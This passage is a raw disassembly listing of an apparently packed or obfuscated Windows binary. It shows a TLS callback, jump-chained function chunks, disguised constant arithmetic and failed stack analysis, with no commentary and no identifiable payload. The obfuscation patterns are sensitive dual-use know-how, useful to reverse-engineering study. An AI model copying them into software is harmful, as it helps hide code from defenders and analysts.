sub_426985 proc near ; CODE XREF: _94j21ax3:0042A97F�j
; sub_42BAD4+9�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042B2BC SIZE 0000001A BYTES
mov [esp+0], eax
pop eax
mov eax, [ebp-14h]
mov eax, [eax+24h]
add eax, [ebp-4]
xor edx, edx
push edx
push eax
jmp loc_42B2BC
sub_426985 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_42699B: ; CODE XREF: sub_42A0CC-66A9�j
jnz loc_4234C0
jmp loc_42A183
; END OF FUNCTION CHUNK FOR sub_42A0CC
; =============== S U B R O U T I N E =======================================
sub_4269A6 proc near ; CODE XREF: _94j21ax3:00429E19�j
; sub_426C7A+57DC�p
xchg ecx, [esp+0]
pop ecx
pop ebp
retn
sub_4269A6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ABCE
loc_4269AC: ; CODE XREF: sub_42ABCE+6�j
jmp loc_429AF8
; END OF FUNCTION CHUNK FOR sub_42ABCE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421330
loc_4269B1: ; CODE XREF: sub_421330+16�j
jmp loc_429126
; END OF FUNCTION CHUNK FOR sub_421330
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42484C
loc_4269B6: ; CODE XREF: sub_42484C+7C02�j
mov eax, [ebp-4]
movzx eax, byte ptr [eax]
shr eax, 1
cmp eax, 66h
jmp loc_424811
; END OF FUNCTION CHUNK FOR sub_42484C
; ---------------------------------------------------------------------------
jmp sub_4238D1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42169F
loc_4269CB: ; CODE XREF: sub_42169F:loc_423E0F�j
jnb loc_421A1C
push eax
push 1939569Bh
pop eax
jmp loc_4273E6
; END OF FUNCTION CHUNK FOR sub_42169F
; =============== S U B R O U T I N E =======================================
sub_4269DD proc near ; DATA XREF: sub_423FCD:loc_42195C�o
xchg esi, [esp+0]
jmp sub_42A61F
sub_4269DD endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4281A5
loc_4269E5: ; CODE XREF: sub_4281A5:loc_425527�j
mov eax, ebx
jmp loc_42A455
; END OF FUNCTION CHUNK FOR sub_4281A5
; =============== S U B R O U T I N E =======================================
sub_4269EC proc near ; CODE XREF: sub_4281A5-6CFB�p
; sub_4281A5-5C3D�p ...
mov eax, [ebx+ecx]
xor eax, [ebx+ecx+4]
cmp eax, 7C61090Eh
jmp nullsub_36
sub_4269EC endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_4269FD: ; CODE XREF: sub_422EB0+2775�j
shr esi, 17h
loc_426A00: ; CODE XREF: sub_422EB0:loc_4218D3�j
push 9DADFF5Fh
mov eax, offset loc_426A1D
xchg eax, [esp+0]
retn
; END OF FUNCTION CHUNK FOR sub_422EB0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_426A0E: ; CODE XREF: sub_42284F:loc_42AE83�j
jmp loc_424CDC
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
loc_426A13: ; CODE XREF: _94j21ax3:004281F3�j
jmp loc_42A8A4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428B5E
loc_426A18: ; CODE XREF: sub_428B5E-4238�j
jmp sub_4239A5
; END OF FUNCTION CHUNK FOR sub_428B5E
; ---------------------------------------------------------------------------
loc_426A1D: ; DATA XREF: sub_422EB0+3B55�o
and eax, 33A1008h
xor eax, 0EDFC165Ch
jmp loc_423EFC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_99. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429259
loc_426A2F: ; CODE XREF: sub_429259+6�j
jmp loc_4231B2
; END OF FUNCTION CHUNK FOR sub_429259
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429862
loc_426A34: ; CODE XREF: sub_429862-14EC�j
; _94j21ax3:loc_42B79E�j
call sub_42574E
push offset sub_4288BF
jmp nullsub_78
; END OF FUNCTION CHUNK FOR sub_429862
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_426A43 proc near ; CODE XREF: sub_42484C+3C5F�j
retn
sub_426A43 endp
; ---------------------------------------------------------------------------
loc_426A44: ; CODE XREF: _94j21ax3:00428CF4�j
jmp locret_4217A7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_426A49: ; CODE XREF: sub_423FCD:loc_425228�j
; sub_423FCD+5136�j
mov edi, eax
push 0BA047ED8h
pop eax
or eax, 23328953h
rol eax, 1
cmp eax, 0A60DF39Eh
jmp loc_422075
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
cdq
jg loc_42A7DB
jmp sub_4213A8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424775
loc_426A70: ; CODE XREF: sub_424775:loc_427232�j
mov eax, [eax]
push edx
pushf
push 0AE5FB7F3h
add edx, ebp
jmp loc_4276FA
; END OF FUNCTION CHUNK FOR sub_424775
; ---------------------------------------------------------------------------
loc_426A80: ; CODE XREF: _94j21ax3:00422D48�j
rol edx, 0Fh
; =============== S U B R O U T I N E =======================================
sub_426A83 proc near ; CODE XREF: sub_425975+9�p
; FUNCTION CHUNK AT 004222B8 SIZE 00000010 BYTES
mov [esp+0], ebx
pop ebx
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jnz loc_423F5C
lea eax, [ebp-125h]
jmp loc_4222B8
sub_426A83 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_426A9F proc near ; DATA XREF: sub_42A430+6�o
; FUNCTION CHUNK AT 00425133 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425A3D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042876F SIZE 0000000D BYTES
xor [esi], ebx
add [esi], ecx
xor [esi], edx
push 61D0F134h
pop eax
sub eax, 6E5A8BCAh
xor eax, 7376656Eh
jmp loc_425133
sub_426A9F endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_103. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_426ABD: ; CODE XREF: _94j21ax3:00427C2A�j
call sub_42AFFE
push eax
ror eax, 14h
mov ds:dword_42C4B8, eax
locret_426ACC: ; CODE XREF: _94j21ax3:00422F04�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_426ACD: ; CODE XREF: sub_423FCD-12E�j
jmp loc_428224
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421457
loc_426AD2: ; CODE XREF: sub_421457+19�j
jmp loc_427B40
; END OF FUNCTION CHUNK FOR sub_421457
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42966A
loc_426AD7: ; CODE XREF: sub_42966A+6�j
rol eax, 14h
push eax
jmp loc_42C490
; END OF FUNCTION CHUNK FOR sub_42966A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429629
loc_426AE0: ; CODE XREF: sub_429629-1D3F�j
; sub_429629:loc_428562�j
call sub_429BC2
test eax, eax
jz loc_424949
jmp loc_42BA3A
; END OF FUNCTION CHUNK FOR sub_429629
; ---------------------------------------------------------------------------
loc_426AF2: ; CODE XREF: _94j21ax3:00428E73�j
jz loc_42364A
jmp loc_42C38E
; =============== S U B R O U T I N E =======================================
sub_426AFD proc near ; CODE XREF: _94j21ax3:loc_424149�p
; _94j21ax3:0042854E�j
; FUNCTION CHUNK AT 004245CB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004278A2 SIZE 0000000E BYTES
mov [esp+0], eax
pop eax
jnb loc_4245CB
push ecx
push 6778A5F4h
pop ecx
or ecx, ds:4000F2h
jmp loc_4278A2
sub_426AFD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_426B19: ; CODE XREF: _94j21ax3:loc_425606�j
jnz loc_426819
loc_426B1F: ; CODE XREF: _94j21ax3:00424E12�j
jmp loc_42252D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_426B24: ; CODE XREF: sub_422EB0+B�j
jmp loc_424A4C
; END OF FUNCTION CHUNK FOR sub_422EB0
; ---------------------------------------------------------------------------
rol ecx, 0Ch
shl ebx, 3
jmp loc_426813
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421388
loc_426B34: ; CODE XREF: sub_421388+9D74�j
mov [ebp-0Ch], eax
jmp loc_425B22
; END OF FUNCTION CHUNK FOR sub_421388
; =============== S U B R O U T I N E =======================================
sub_426B3C proc near ; CODE XREF: sub_423C3E+7�p
; sub_4272E9-2BE3�j ...
; FUNCTION CHUNK AT 004256B8 SIZE 00000005 BYTES
push offset loc_42ACF7
jmp loc_4256B8
sub_426B3C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F55
loc_426B46: ; CODE XREF: sub_423F55:loc_422110�j
xchg edi, [edx]
jnb loc_423B95
mov [edx], ebp
shr esi, 11h
jmp loc_42C244
; END OF FUNCTION CHUNK FOR sub_423F55
; ---------------------------------------------------------------------------
add ecx, 0B3AC5D5Fh
jmp loc_42764A
; ---------------------------------------------------------------------------
loc_426B63: ; CODE XREF: _94j21ax3:0042C5B0�j
mov [ecx], ebp
; =============== S U B R O U T I N E =======================================
sub_426B65 proc near ; CODE XREF: sub_4284C0:loc_4211CE�p
; FUNCTION CHUNK AT 00424BC3 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00429D42 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A22E SIZE 00000005 BYTES
mov [esp+0], ebx
pop ebx
or eax, eax
jnz loc_424BC3
call sub_42574E
mov edx, 0B9726E5Ah
push offset loc_42652A
jmp loc_429D42
sub_426B65 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_426B85 proc near ; DATA XREF: sub_42AB30-63C5�o
push eax
retn
sub_426B85 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426B87 proc near ; CODE XREF: sub_422866+5�p
; sub_424775+5�p
push ebp
mov ebp, esp
push ecx
mov esp, ebp
push offset loc_423B36
jmp sub_42BED6
sub_426B87 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421CAA
loc_426B97: ; CODE XREF: sub_421CAA:loc_421CB6�j
jnz loc_4280CE
jmp loc_42325F
; END OF FUNCTION CHUNK FOR sub_421CAA
; =============== S U B R O U T I N E =======================================
sub_426BA2 proc near ; CODE XREF: sub_42780F�j
; FUNCTION CHUNK AT 004293EB SIZE 00000005 BYTES
push ebp
push offset loc_429AD9
jmp loc_4293EB
sub_426BA2 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422C48
loc_426BAD: ; CODE XREF: sub_422C48+1956�j
add esi, 1FE2A9B7h
test ecx, 898445FEh
jmp loc_42C1DD
; END OF FUNCTION CHUNK FOR sub_422C48
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_426BBE: ; CODE XREF: sub_42C0BC-10E2�j
cmp ebx, 42423AD5h
jmp loc_428E26
; END OF FUNCTION CHUNK FOR sub_42C0BC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425934
loc_426BC9: ; CODE XREF: sub_425934:loc_429F5E�j
jl loc_421BE1
; END OF FUNCTION CHUNK FOR sub_425934
; START OF FUNCTION CHUNK FOR sub_4273AE
loc_426BCF: ; CODE XREF: sub_4273AE+10�j
jmp loc_427FB6
; END OF FUNCTION CHUNK FOR sub_4273AE
; ---------------------------------------------------------------------------
xchg ebp, ecx
adc eax, 0FC6AE874h
jmp loc_421BE1
; ---------------------------------------------------------------------------
popf
xchg ecx, [ebx]
jmp sub_421822
; ---------------------------------------------------------------------------
loc_426BE9: ; DATA XREF: sub_4237DC+2056�o
mov eax, [ebp-8]
shr eax, 0Bh
xor [ebp-8], eax
jmp loc_424C80
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421047
loc_426BF7: ; CODE XREF: sub_421047:loc_427E88�j
mov eax, [ebp-0Ch]
jmp loc_423924
; END OF FUNCTION CHUNK FOR sub_421047
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_426BFF: ; CODE XREF: sub_42C0BC:loc_422E19�j
mov eax, [ebp-10h]
jmp loc_4249AF
; END OF FUNCTION CHUNK FOR sub_42C0BC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42972F
loc_426C07: ; CODE XREF: sub_42972F+1EE�j
or [ecx+edx], al
mov eax, [ebp-0Ch]
push eax
push edi
jmp loc_42204E
; END OF FUNCTION CHUNK FOR sub_42972F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425819
loc_426C14: ; CODE XREF: sub_425819:loc_42405C�j
shr eax, 8
jnz loc_422318
xor eax, ecx
add ecx, eax
push ecx
push 0B5C339FEh
pop ecx
jmp loc_42B8DE
; END OF FUNCTION CHUNK FOR sub_425819
; ---------------------------------------------------------------------------
loc_426C2D: ; CODE XREF: _94j21ax3:0042C3F0�j
popf
; =============== S U B R O U T I N E =======================================
sub_426C2E proc near ; CODE XREF: sub_422898:loc_421F6A�p
mov [esp+0], esi
pop esi
push ecx
push offset sub_421A9F
jmp nullsub_147
sub_426C2E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422790
loc_426C3D: ; CODE XREF: sub_422790+5ED5�j
add edx, 75832783h
mov [edx], al
pop edx
; END OF FUNCTION CHUNK FOR sub_422790
; START OF FUNCTION CHUNK FOR sub_42ADA2
loc_426C46: ; CODE XREF: sub_42C24F:loc_4214C7�j
; sub_42C24F-7711�j ...
jnb loc_425B8C
jmp loc_42963B
; END OF FUNCTION CHUNK FOR sub_42ADA2
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426C51 proc near ; CODE XREF: sub_42BA8A�j
push ebp
mov ebp, esp
call sub_422707
pushf
xor ebx, ecx
jmp sub_4210C7
sub_426C51 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428694
loc_426C61: ; CODE XREF: sub_428694+7�j
push ecx
push 0B26A12E5h
pop ecx
add ecx, 4DD817A8h
push offset sub_42ABD9
jmp loc_427F9D
; END OF FUNCTION CHUNK FOR sub_428694
; ---------------------------------------------------------------------------
loc_426C78: ; CODE XREF: _94j21ax3:0042322C�j
add ebp, ebx
; =============== S U B R O U T I N E =======================================
sub_426C7A proc near ; CODE XREF: sub_423F55+74E0�p
; FUNCTION CHUNK AT 00424113 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00426EE2 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042C454 SIZE 00000012 BYTES
mov [esp+0], eax
pop eax
add eax, [ebp-4]
add eax, 5
loc_426C84: ; CODE XREF: sub_423324+1927�j
cmp eax, ds:dword_425BD0
jz loc_42C454
loc_426C90: ; CODE XREF: sub_423F55-1D7F�j
; sub_423F55+D11�j
jnb loc_424113
jmp loc_426EE2
sub_426C7A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov esi, 0FEB331CFh
shr edi, 8
jmp sub_421047
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_426CA8: ; CODE XREF: sub_423324:loc_429F28�j
add esi, 89768141h
mov [esi], eax
pop esi
push 0
loc_426CB3: ; CODE XREF: _94j21ax3:004216F2�j
push 7F133CB8h
pop eax
add eax, 4F09C445h
jmp loc_42B920
; END OF FUNCTION CHUNK FOR sub_423324
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_95. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ABD9
loc_426CC5: ; CODE XREF: sub_42ABD9+3�j
jmp sub_4249A9
; END OF FUNCTION CHUNK FOR sub_42ABD9
; ---------------------------------------------------------------------------
loc_426CCA: ; CODE XREF: _94j21ax3:00424F3F�j
jmp loc_424218
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424C37
loc_426CCF: ; CODE XREF: sub_424C37-F54�j
jmp loc_426856
; END OF FUNCTION CHUNK FOR sub_424C37
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1AE
loc_426CD4: ; CODE XREF: sub_42C1AE-74A7�j
sub eax, 0D97D9668h
or eax, 0EB1C75EDh
add eax, 0E18A04h
xor ebx, ebx
; END OF FUNCTION CHUNK FOR sub_42C1AE
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_426CE8: ; CODE XREF: sub_422EB0+2766�j
xor edx, edx
push offset loc_42A665
jmp locret_4266F0
; END OF FUNCTION CHUNK FOR sub_422EB0
; =============== S U B R O U T I N E =======================================
sub_426CF4 proc near ; CODE XREF: sub_42540A+6�p
; _94j21ax3:0042B549�j
; FUNCTION CHUNK AT 0042BAAC SIZE 00000005 BYTES
mov [esp+0], esi
pop esi
push eax
mov eax, [ebp-4]
mov eax, [eax+3Ch]
cdq
jmp loc_42BAAC
sub_426CF4 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_121. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_426D06: ; CODE XREF: sub_4294B3+35F�j
jmp loc_424433
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4268C1
loc_426D0B: ; CODE XREF: sub_4268C1-1334�j
jmp nullsub_40
; END OF FUNCTION CHUNK FOR sub_4268C1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42878A
loc_426D10: ; CODE XREF: sub_42878A:loc_428C12�j
; _94j21ax3:00428C25�j
and esi, 0A61FF99Eh
push offset loc_42B19A
jmp loc_42B874
; END OF FUNCTION CHUNK FOR sub_42878A
; ---------------------------------------------------------------------------
xchg ebp, [eax]
cmp edi, 0A194695h
jmp loc_4216CA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_426D2D: ; CODE XREF: sub_423324+3362�j
rol ebp, 5
adc ebx, 7498743Fh
xor ecx, ebp
jmp loc_422016
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423614
loc_426D3D: ; CODE XREF: sub_423614-624�j
; sub_423324:loc_429088�j ...
jnb loc_421580
test byte ptr [ebp-8], 2
jz loc_42B511
push ebp
mov eax, [ebp-20h]
call sub_429862
pop ecx
push offset sub_421578
jmp loc_42109B
; END OF FUNCTION CHUNK FOR sub_423614
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_426D61 proc near ; CODE XREF: sub_421457+9080�j
retn
sub_426D61 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA5F
loc_426D62: ; CODE XREF: sub_42AA5F-6D87�j
jmp loc_4285ED
; END OF FUNCTION CHUNK FOR sub_42AA5F
; ---------------------------------------------------------------------------
loc_426D67: ; CODE XREF: _94j21ax3:loc_424C93�j
xor edx, 15A5D1EDh
test edx, 200h
jmp loc_429D7B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4228FF
loc_426D78: ; CODE XREF: sub_4228FF:loc_428CD5�j
push 42FD2E32h
pop edi
sub edi, 1719E56h
add edi, 0BEB6970Dh
popf
xchg edi, [esp-4+arg_0]
jmp sub_425A09
; END OF FUNCTION CHUNK FOR sub_4228FF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_426D93: ; CODE XREF: sub_42A0CC:loc_429176�j
jnz loc_42356D
jmp loc_42B87E
; END OF FUNCTION CHUNK FOR sub_42A0CC
; ---------------------------------------------------------------------------
loc_426D9E: ; CODE XREF: _94j21ax3:004218AD�j
ja nullsub_193
; =============== S U B R O U T I N E =======================================
sub_426DA4 proc near ; CODE XREF: _94j21ax3:00424225�p
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042349D SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00423CE8 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00424716 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042A73C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B33B SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042B5FC SIZE 00000005 BYTES
mov [esp+0], edi
pop edi
add eax, ebp
add eax, 3A422D4h
jmp loc_423CE8
sub_426DA4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4249A9
loc_426DB5: ; CODE XREF: sub_4249A9:loc_428B92�j
jnz loc_421BB6
jmp loc_4245D0
; END OF FUNCTION CHUNK FOR sub_4249A9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_426DC0: ; CODE XREF: sub_4294B3-2C86�j
jno loc_429A4B
sub eax, 57044F2Bh
push ebx
jmp loc_42214D
; END OF FUNCTION CHUNK FOR sub_4294B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424B54
loc_426DD2: ; CODE XREF: sub_424B54+17�j
ror eax, 6
mov ds:dword_42409C, eax
retn
; END OF FUNCTION CHUNK FOR sub_424B54
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4210AA
loc_426DDC: ; CODE XREF: sub_4210AA+D�j
jmp sub_428993
; END OF FUNCTION CHUNK FOR sub_4210AA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A8BB
loc_426DE1: ; CODE XREF: sub_42A8BB+7DF�j
call sub_427021
loc_426DE6: ; DATA XREF: sub_42284F+EBE�o
add eax, ebp
push offset loc_422997
jmp nullsub_180
; END OF FUNCTION CHUNK FOR sub_42A8BB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_426DF2: ; CODE XREF: sub_4272E9:loc_422B06�j
jno loc_427B16
jp sub_423F43
jmp loc_423846
; END OF FUNCTION CHUNK FOR sub_4272E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4221B8
loc_426E03: ; CODE XREF: sub_4221B8:loc_42BAB1�j
push offset loc_423939
jmp loc_421375
; END OF FUNCTION CHUNK FOR sub_4221B8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4210AA
loc_426E0D: ; CODE XREF: sub_4210AA+AEB5�j
jnz loc_4288F9
jmp loc_429D3D
; END OF FUNCTION CHUNK FOR sub_4210AA
; ---------------------------------------------------------------------------
sbb edx, 86E66949h
jmp sub_426744
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4265C2
loc_426E23: ; CODE XREF: sub_4265C2+C�j
cmp eax, 0FECCAD31h
jmp loc_429DD7
; END OF FUNCTION CHUNK FOR sub_4265C2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425330
loc_426E2E: ; CODE XREF: sub_425330:loc_422283�j
test byte ptr [eax-8], 10h
jz loc_42A024
inc [ebp+var_8]
loc_426E3B: ; CODE XREF: sub_425330:loc_425223�j
; sub_429848+C�j
mov eax, [ebp+var_8]
pop ecx
pop ecx
push offset loc_42A022
jmp nullsub_41
; END OF FUNCTION CHUNK FOR sub_425330
; ---------------------------------------------------------------------------
loc_426E4A: ; DATA XREF: sub_423B78+1266�o
neg eax
cmp ax, 0A5B3h
jnz loc_423B81
retn
; ---------------------------------------------------------------------------
loc_426E57: ; CODE XREF: _94j21ax3:00426825�j
jmp sub_42574E
; =============== S U B R O U T I N E =======================================
sub_426E5C proc near ; CODE XREF: sub_42C473:loc_42AE93�p
; FUNCTION CHUNK AT 00423D8A SIZE 00000013 BYTES
mov eax, large fs:0
loc_426E63: ; CODE XREF: sub_423324+A55�j
; sub_426E5C-30CA�j
jno loc_423D8A
cmp dword ptr [eax], 0FFFFFFFFh
jmp loc_4233F6
sub_426E5C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428BBD
loc_426E71: ; CODE XREF: sub_428BBD:loc_423212�j
jnz loc_42A6C2
jmp loc_425A25
; END OF FUNCTION CHUNK FOR sub_428BBD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422FDC
loc_426E7C: ; CODE XREF: sub_422FDC+7999�j
jnz loc_423B68
mov eax, 6
sub eax, [ebp-0Ch]
call sub_4232B6
; END OF FUNCTION CHUNK FOR sub_422FDC
; START OF FUNCTION CHUNK FOR sub_42A4F4
loc_426E8F: ; CODE XREF: sub_42A4F4+13�j
jmp loc_4297BF
; END OF FUNCTION CHUNK FOR sub_42A4F4
; ---------------------------------------------------------------------------
loc_426E94: ; CODE XREF: _94j21ax3:00426937�j
jmp loc_42521A
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push edx
jmp loc_428CBF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424EFA
loc_426EA4: ; CODE XREF: sub_424EFA+4F6A�j
xchg ebx, [esp+0]
push 10h
push offset sub_421330
jmp loc_424748
; END OF FUNCTION CHUNK FOR sub_424EFA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C057
loc_426EB3: ; CODE XREF: sub_42C057:loc_4299E0�j
xchg edx, [esp+0]
push 0
push esi
push 893F8143h
pop esi
sub esi, 0EFC2A770h
jmp loc_421CDB
; END OF FUNCTION CHUNK FOR sub_42C057
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A7A6
loc_426ECA: ; CODE XREF: sub_42A7A6-EB�j
jge loc_42B996
loc_426ED0: ; CODE XREF: sub_42ADA2:loc_42B9F9�j
call sub_429BC2
test eax, eax
jz loc_424949
jmp loc_422F1E
; END OF FUNCTION CHUNK FOR sub_42A7A6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426C7A
loc_426EE2: ; CODE XREF: sub_426C7A+1C�j
mov eax, [ebp-4]
call sub_42ABCE
mov [ebp-8], eax
push offset loc_4250B7
jmp nullsub_43
; END OF FUNCTION CHUNK FOR sub_426C7A
; ---------------------------------------------------------------------------
pushf
mov [esp], eax
; START OF FUNCTION CHUNK FOR sub_423F55
loc_426EFB: ; CODE XREF: sub_423F55:loc_426F87�j
ror eax, 0Ah
mov ds:dword_429F84, eax
retn
; END OF FUNCTION CHUNK FOR sub_423F55
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_426F05: ; CODE XREF: sub_423324+AD1�j
jmp loc_4243B4
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422764
loc_426F0A: ; CODE XREF: sub_422764+1203�j
jmp loc_429E69
; END OF FUNCTION CHUNK FOR sub_422764
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C03F
loc_426F0F: ; CODE XREF: sub_422AD5+8�j
; sub_42C03F+D�j
rol eax, 0Ah
; END OF FUNCTION CHUNK FOR sub_42C03F
; START OF FUNCTION CHUNK FOR sub_42284F
loc_426F12: ; CODE XREF: sub_42284F:loc_42397F�j
push ecx
mov ecx, eax
jmp loc_4287D8
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428B5E
loc_426F1A: ; CODE XREF: sub_428B5E-5A39�j
test edi, 0C8A0ADBFh
jmp loc_42422A
; END OF FUNCTION CHUNK FOR sub_428B5E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_16. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422141
loc_426F26: ; CODE XREF: sub_422141+3963�j
jmp loc_42A885
; END OF FUNCTION CHUNK FOR sub_422141
; ---------------------------------------------------------------------------
db 17h
dword_426F2C dd 77EB36A5h ; DATA XREF: sub_42C057:loc_4240CF�w
; sub_427773+A�w
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B9CF
loc_426F30: ; CODE XREF: sub_42B9CF-71E�j
jmp loc_4281B8
; END OF FUNCTION CHUNK FOR sub_42B9CF
; ---------------------------------------------------------------------------
pop esp
sbb dh, [eax+0] ; DATA XREF: sub_427D15+3�o
; _94j21ax3:loc_42B3A0�o ...
; START OF FUNCTION CHUNK FOR TlsCallback_0
loc_426F3C: ; CODE XREF: TlsCallback_0-7447�j
jmp loc_42A1D6
; END OF FUNCTION CHUNK FOR TlsCallback_0
; ---------------------------------------------------------------------------
db 62h, 0C3h, 7
dword_426F44 dd 77E60000h ; DATA XREF: sub_427D15:loc_4276BF�r
; sub_424EB4:loc_42A0AF�w ...
dword_426F48 dd 0B97256B6h, 8CCCD8B2h, 0B18D8CB8h, 0C3544700h
; DATA XREF: _94j21ax3:loc_425248�o
; sub_427D15-646�o
byte_426F58 db 1 ; DATA XREF: sub_421656+3�r
; sub_426F9E-4E24�r ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42982D
loc_426F59: ; CODE XREF: sub_42982D+10B2�j
jmp nullsub_185
; END OF FUNCTION CHUNK FOR sub_42982D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA5F
